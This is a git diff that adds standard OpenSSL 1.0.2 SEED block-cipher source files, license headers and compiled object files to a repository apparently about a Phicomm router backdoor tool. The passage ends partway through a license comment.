+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_SEED_H
+# define HEADER_SEED_H
+
+# include <openssl/opensslconf.h>
+# include <openssl/e_os2.h>
+# include <openssl/crypto.h>
+
+# ifdef OPENSSL_NO_SEED
+#  error SEED is disabled.
+# endif
+
+/* look whether we need 'long' to get 32 bits */
+# ifdef AES_LONG
+#  ifndef SEED_LONG
+#   define SEED_LONG 1
+#  endif
+# endif
+
+# if !defined(NO_SYS_TYPES_H)
+#  include <sys/types.h>
+# endif
+
+# define SEED_BLOCK_SIZE 16
+# define SEED_KEY_LENGTH 16
+
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+typedef struct seed_key_st {
+# ifdef SEED_LONG
+    unsigned long data[32];
+# else
+    unsigned int data[32];
+# endif
+} SEED_KEY_SCHEDULE;
+
+# ifdef OPENSSL_FIPS
+void private_SEED_set_key(const unsigned char rawkey[SEED_KEY_LENGTH],
+                          SEED_KEY_SCHEDULE *ks);
+# endif
+void SEED_set_key(const unsigned char rawkey[SEED_KEY_LENGTH],
+                  SEED_KEY_SCHEDULE *ks);
+
+void SEED_encrypt(const unsigned char s[SEED_BLOCK_SIZE],
+                  unsigned char d[SEED_BLOCK_SIZE],
+                  const SEED_KEY_SCHEDULE *ks);
+void SEED_decrypt(const unsigned char s[SEED_BLOCK_SIZE],
+                  unsigned char d[SEED_BLOCK_SIZE],
+                  const SEED_KEY_SCHEDULE *ks);
+
+void SEED_ecb_encrypt(const unsigned char *in, unsigned char *out,
+                      const SEED_KEY_SCHEDULE *ks, int enc);
+void SEED_cbc_encrypt(const unsigned char *in, unsigned char *out, size_t len,
+                      const SEED_KEY_SCHEDULE *ks,
+                      unsigned char ivec[SEED_BLOCK_SIZE], int enc);
+void SEED_cfb128_encrypt(const unsigned char *in, unsigned char *out,
+                         size_t len, const SEED_KEY_SCHEDULE *ks,
+                         unsigned char ivec[SEED_BLOCK_SIZE], int *num,
+                         int enc);
+void SEED_ofb128_encrypt(const unsigned char *in, unsigned char *out,
+                         size_t len, const SEED_KEY_SCHEDULE *ks,
+                         unsigned char ivec[SEED_BLOCK_SIZE], int *num);
+
+#ifdef  __cplusplus
+}
+#endif
+
+#endif                          /* HEADER_SEED_H */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed.o
new file mode 100644
index 0000000000000000000000000000000000000000..674607c4046b10e8032ae8fbc5c33706494abebc
GIT binary patch
literal 14720
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed_cbc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed_cbc.c
new file mode 100644
index 0000000..33e6887
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed_cbc.c
@@ -0,0 +1,65 @@
+/* crypto/seed/seed_cbc.c -*- mode:C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright (c) 1998-2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#include <openssl/seed.h>
+#include <openssl/modes.h>
+
+void SEED_cbc_encrypt(const unsigned char *in, unsigned char *out,
+                      size_t len, const SEED_KEY_SCHEDULE *ks,
+                      unsigned char ivec[SEED_BLOCK_SIZE], int enc)
+{
+    if (enc)
+        CRYPTO_cbc128_encrypt(in, out, len, ks, ivec,
+                              (block128_f) SEED_encrypt);
+    else
+        CRYPTO_cbc128_decrypt(in, out, len, ks, ivec,
+                              (block128_f) SEED_decrypt);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed_cbc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed_cbc.o
new file mode 100644
index 0000000000000000000000000000000000000000..b0231dbb7ecc957d73c9541b0486263a3f14eb3d
GIT binary patch
literal 1776
zcmbu8O>fgc5QfK1p#@SXhyzjqg$pVlT_r6N&;xQCoFEht)TWg<AmccONHiaEHd4a@
zPMqM-pVFVe5&i{Nj))sVD)ZW&bYmP2Fw%Hu9`Cy!v%Bw{T4lzvNX()Kbest#I?Nr%
zb`;vQKzaIc?&?qH{TH3DeOLhghL0IjwOn2=EblajT|F$^S8J-cQo1{g($d@2qAK3G
z5o0K6mVJ@^1bg+#4$TmK0+Z=4atyQHY>~CUXf5UE<_~zm;FqI6MAwq`Zw>Z1OW%*O
z`s6YzfHlY}CRMp;)sqZaj!ymwBR)5U&rji~#-!yry<n_U_I!mo>X)`P23g#m!gr@|
ze+s8T5VTys=_{YM9p@oJH|YA|sISSb*6N!ZHMd@=Y&#9Nv9Vcm+_;-`DQ`V{+NeWS
zTD><GMkBR?c$CR5LU}zf)B|>t{S5oBqu4G1vVr4*3O^6XhPwr=aMTY5ewJN$fnylo
z$H=1uA2k?twAbWThjH7MC=B*IrGtG<s^w{qRC6#O<@Y+Bpv$b=(}ChUzB16B|2oNE
zb%&}S_WD7nN2H<=g0}lI^g6+K%Kr%pEXLhW-%OhsOzu&f#eF44yTp##*zBf#Mq$`q
zL|>xQ++rTN(Q*#g6P|uaUZP7k7{j#NoM6m<)t6X{F^lY`$^5rW$g#{X?YhCtt{=_B
zh(#ypF$Z}4Nx1~mK@t_lBo3s0f}0#*%(VV6>5$%6TK}B;Wu4!0QcyW3oFBBJ7oIgY
rrv8c#TRYh>-ry<rv>q&dc8uszvY`<Y!_xJ`yUo(u3EVTZ2-EuCt45a}

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed_cfb.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed_cfb.c
new file mode 100644
index 0000000..3437d7b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/seed/seed_cfb.c
@@ -0,0 +1,118 @@
+/* crypto/seed/seed_cfb.c -*- mode:C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright (c) 1998-2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
